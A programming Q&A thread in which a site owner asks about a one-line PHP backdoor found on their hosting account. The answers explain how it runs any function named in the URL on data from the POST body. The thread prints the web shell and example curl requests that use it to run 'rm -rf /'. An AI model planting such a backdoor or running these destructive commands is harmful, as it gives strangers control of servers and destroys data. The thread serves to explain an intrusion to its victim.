# Just found malicious PHP code

Tags: php, shell

I found malicious php file on my hosting account with this code:

```
<?=$_GET[0]($_POST[1]);?>
```

Please help me to better understand this code, what is the possibilities of this code for uploader?

Thanks in advance.

Answer (score 6, accepted):

```
$func = 'strlen';
$arg  = 'foo';

echo $func($arg); // output: 3
```

You're looking at a variable function invocation. Just in your case the function name comes from the query string in the URL and the argument from the HTTP POST body. So, this can execute anything at all. Likely somebody will try to use it to execute shell code via `exec`.

E.g.:

```
$ curl example.com/infected_file.php?exec -d 'rm%20-rf%20/'
```

<sub>(Not 100% sure this would do it as is and I don't feel like trying, but you get the idea.)</sub>

Comment: Nice one deceze. **+1**

Comment: I think it would be a little better to write the real exploit potential explicitely in the example, e.g. 'system' && 'rm -rf /'. It's clear to most people anyways, but it never helps to be _more_ clear. Still +1 for being correct.

Comment: @deceze, noooooo don't ever try this. but you want your hdd clean you should be using `infected_file.php?0=exec -d 'rm%20-rf%20/'` (just give php root permission also :P)